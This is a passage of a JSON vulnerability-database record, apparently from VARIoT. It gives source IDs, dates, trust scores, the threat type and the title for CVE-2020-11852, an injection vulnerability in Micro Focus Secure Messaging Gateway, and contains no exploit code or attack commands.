            "date": "2020-10-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-009059"
          },
          {
            "date": "2020-08-11T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          },
          {
            "date": "2024-11-21T04:58:45.460000",
            "db": "NVD",
            "id": "CVE-2020-11852"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Micro Focus Secure Messaging Gateway injection vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-50256"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-280"
          }
        ],
        "trust": 0.6
      }
    }